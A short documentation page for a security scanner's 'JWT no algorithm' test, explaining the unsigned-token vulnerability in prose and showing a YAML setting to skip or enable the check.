Injection: JWT no algorithm¶

Identifier: jwt_alg_none

Scanner(s) Support¶

GraphQL Scanner	REST Scanner	WebApp Scanner	ASM Scanner

Description¶

JWT 'none' algorithm vulnerabilities occur when servers accept unsigned tokens marked with the 'none' algorithm, allowing attackers to forge tokens and impersonate any user without proper signature validation.

How we test: We modify JWT tokens to use the 'none' algorithm and remove signatures, then analyze responses to detect if the server accepts unsigned tokens. We verify if the server properly rejects tokens with the 'none' algorithm or enforces signature validation.

Execution conditions (BLST):

Runs when this sub-test is enabled and a suitable authenticated JWT exchange is found by the shared JWT baseline selection logic.

Configuration¶

Example¶

Example configuration:

---
security_tests:
  jwt_alg_none:
    skip: false

Reference¶

`skip`¶

Type : boolean

Skip the test if true.